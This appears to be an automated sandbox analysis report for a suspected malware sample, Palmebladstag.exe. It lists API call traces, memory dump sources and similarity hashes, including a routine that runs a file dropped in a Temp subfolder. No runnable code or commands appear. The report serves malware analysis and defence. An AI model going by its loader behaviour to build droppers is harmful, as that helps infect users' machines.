                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            • Opcode ID: 788b6a00b7ec5152489f9dc894b393f1b4e1631423b852db40bb4005bf856efe
                                            • Instruction ID: f3300c01cb1876a67fd1897e7389f13c8369481b1b26804573fe4f9c45dca3ad
                                            • Opcode Fuzzy Hash: 788b6a00b7ec5152489f9dc894b393f1b4e1631423b852db40bb4005bf856efe
                                            • Instruction Fuzzy Hash: 22E0ECB4900209AFDB009F64DC09E6F7BBCFB00344F40CA21BD11E2150F778E9108AA9
                                            APIs
                                              • Part of subcall function 00405DE2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Palmebladstag.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,76233410,0040329C), ref: 00405E3A
                                              • Part of subcall function 00405DE2: CharNextA.USER32(?,?,?,00000000), ref: 00405E47
                                              • Part of subcall function 00405DE2: CharNextA.USER32(?,"C:\Users\user\Desktop\Palmebladstag.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,76233410,0040329C), ref: 00405E4C
                                              • Part of subcall function 00405DE2: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,76233410,0040329C), ref: 00405E5C
                                            • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233410,0040329C), ref: 004030DC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: Char$Next$CreateDirectoryPrev
                                            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 4115351271-3512041753
                                            • Opcode ID: 8e7680eb481f2e00cc16df113ff911000dfe49d9d02a3d1b6cba6af61926cd3a
                                            • Instruction ID: c9728f7b553dd8aa4c0e43ad66b561e8a411fb1fe81b444dc1201db4bd0af2db
                                            • Opcode Fuzzy Hash: 8e7680eb481f2e00cc16df113ff911000dfe49d9d02a3d1b6cba6af61926cd3a
                                            • Instruction Fuzzy Hash: 13D09222506D3122E99132263C06FCF1A4C8F8B35AF51817BF50A781855A6D1A92C9FE
                                            APIs
                                              • Part of subcall function 00405E7B: FindFirstFileA.KERNELBASE(?,007A0548,C:\,00405755,C:\,C:\,00000000,C:\,C:\,?,?,76233410,00405474,?,C:\Users\user\AppData\Local\Temp\,76233410), ref: 00405E86
                                              • Part of subcall function 00405E7B: FindClose.KERNEL32(00000000), ref: 00405E92
                                            • lstrlenA.KERNEL32 ref: 004021C8
                                            • lstrlenA.KERNEL32(00000000), ref: 004021D2
                                            • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004021FA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: FileFindlstrlen$CloseFirstOperation
                                            • String ID:
                                            • API String ID: 1486964399-0
                                            • Opcode ID: 9c2572ac91e86a7e84f3e78c8e2e4cc1d05c19d5f90676246a6f32a7a136316a
                                            • Instruction ID: 6e3c735526762eff27cd4463b0056e5035c8fbacae3d5ab82d1513810bbffb23
                                            • Opcode Fuzzy Hash: 9c2572ac91e86a7e84f3e78c8e2e4cc1d05c19d5f90676246a6f32a7a136316a
                                            • Instruction Fuzzy Hash: F4117071904348AACB10EFB9C94999EBAF8EF04314F10813BA514FB2C1E6BDD9008B59
                                            APIs
                                              • Part of subcall function 00404E84: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00000000,0078DCE3,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EBD
                                              • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FA6,Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00000000,0078DCE3,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ECD
                                              • Part of subcall function 00404E84: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00402FA6,00402FA6,Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00000000,0078DCE3,007898A8), ref: 00404EE0
                                              • Part of subcall function 00404E84: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\), ref: 00404EF2
                                              • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                              • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                              • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                              • Part of subcall function 00405347: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007A0500,Error launching installer), ref: 0040536C
                                              • Part of subcall function 00405347: CloseHandle.KERNEL32(?), ref: 00405379
                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                            • String ID:
                                            • API String ID: 3521207402-0
                                            • Opcode ID: 849ca0252580d62ba0648720a78272b05f2920c66fa269258102ebd42fc44e71
                                            • Instruction ID: 722efecc7e06c8093299217de639b7a0821a1f344b96e2d3c9afd93a0f234941
                                            • Opcode Fuzzy Hash: 849ca0252580d62ba0648720a78272b05f2920c66fa269258102ebd42fc44e71
                                            • Instruction Fuzzy Hash: 40018031900119EBCF10AFA1CD859AE7B75EB00354F20857BFA01B51E0D7B98A81DFAA
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000002,00405CA3,00000000,00000002,?,00000002,?,?,00405CA3,80000002,Software\Microsoft\Windows\CurrentVersion,?,Remove folder: ,?), ref: 00405A87
                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00405CA3,?,00405CA3), ref: 00405AA8
                                            • RegCloseKey.KERNELBASE(?), ref: 00405AC9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID:
                                            • API String ID: 3677997916-0
                                            • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                            • Instruction ID: 3b0245f56489bc6861cff030ff267d915796a633b737c7f0fb79f2751f8918b0
                                            • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                            • Instruction Fuzzy Hash: 74015A7114020AEFDB128F64EC88AEB3FACEF14394F044136F905A6260D235D964CFA5
                                            APIs
                                              • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                            • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402466
                                            • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003,00020019), ref: 00402479
                                            • RegCloseKey.ADVAPI32(?,?,?,prludyur\ma\,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: Enum$CloseOpenValue
                                            • String ID:
                                            • API String ID: 167947723-0
                                            • Opcode ID: 00d63fb13b96680743d07c84458faf30f664b9c0b0eff454e5cb3268e8ced7ea
                                            • Instruction ID: d28fcdc599a7f9727bcbc73a1b2195d927587ee9f1dfd2233f1a348fd0a26dbd
                                            • Opcode Fuzzy Hash: 00d63fb13b96680743d07c84458faf30f664b9c0b0eff454e5cb3268e8ced7ea
                                            • Instruction Fuzzy Hash: AEF0F472A04205EFE7119F689E8CEBF7A6CEF40348F10483FF105B61C0D6B95E41962A
                                            APIs
                                              • Part of subcall function 00405800: GetFileAttributesA.KERNELBASE(?,?,00405418,?,?,00000000,004055FB,?,?,?,?), ref: 00405805
                                              • Part of subcall function 00405800: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405819
                                            • RemoveDirectoryA.KERNELBASE(?,?,?,00000000,004055FB), ref: 00405427
                                            • DeleteFileA.KERNEL32(?,?,?,00000000,004055FB), ref: 0040542F
                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405447
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: File$Attributes$DeleteDirectoryRemove
                                            • String ID:
                                            • API String ID: 1655745494-0
                                            • Opcode ID: 7ce6c77110259a770026784a7bafc9becd511e2727126a845108ec838af216ef
                                            • Instruction ID: 6a50eb07035ea0d1215e1b01d4b5f5212916e4cef1ed7608b9b3deacc9b5f9c8
                                            • Opcode Fuzzy Hash: 7ce6c77110259a770026784a7bafc9becd511e2727126a845108ec838af216ef
                                            • Instruction Fuzzy Hash: D9E0E531919A9066C31067309908BDF2AD8DF8632AF44493AF962B11D0D338488A8EAF
                                            APIs
                                            • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Beedi145,?), ref: 00401E1E
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Beedi145, xrefs: 00401E09
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: ExecuteShell
                                            • String ID: C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Beedi145
                                            • API String ID: 587946157-4109978481
                                            • Opcode ID: 9c81a7cd00596487d97187a70d7b4dc128d0b5965840aa0207a205729a165f7b
                                            • Instruction ID: 65620240301e045641c79ca9780ea5e083df883982ed968680c53d4afc27f8c5
                                            • Opcode Fuzzy Hash: 9c81a7cd00596487d97187a70d7b4dc128d0b5965840aa0207a205729a165f7b
                                            • Instruction Fuzzy Hash: 43F0F672B041406ACB11ABB5DD8AE6D7BA4DB41318F24093BF150F71C2D9FD88419B18
                                            APIs
                                              • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                            • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F6
                                            • RegCloseKey.ADVAPI32(?,?,?,prludyur\ma\,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID:
                                            • API String ID: 3677997916-0
                                            • Opcode ID: 403ee65ace6ea91cca258cee7771b98eb28274de88771889a0fa46c5edff9202
                                            • Instruction ID: ce2297d9d5ce314a5bfea79886eaba96e34c70be170e39046d40c33bd9eb9c4f
                                            • Opcode Fuzzy Hash: 403ee65ace6ea91cca258cee7771b98eb28274de88771889a0fa46c5edff9202
                                            • Instruction Fuzzy Hash: DB119E31D05205EFDB15DF64CA889AFBBB4EF45344F20843FE446B62C0D2B85A41DB2A
                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 6e648e4d60bbbe4240689ab11f1c8e4383af39775b03d872555c2639b8fa9900
                                            • Instruction ID: 0ac01c35b1a0eb5cd592cd1bd468c7a0eb97994f07403c330b4f6ecb6608de49
                                            • Opcode Fuzzy Hash: 6e648e4d60bbbe4240689ab11f1c8e4383af39775b03d872555c2639b8fa9900
                                            • Instruction Fuzzy Hash: 7D01F431628210ABE7194B789C04B6A3698E751359F10C23BF911F76F1D67CDC028B4D
                                            APIs
                                              • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
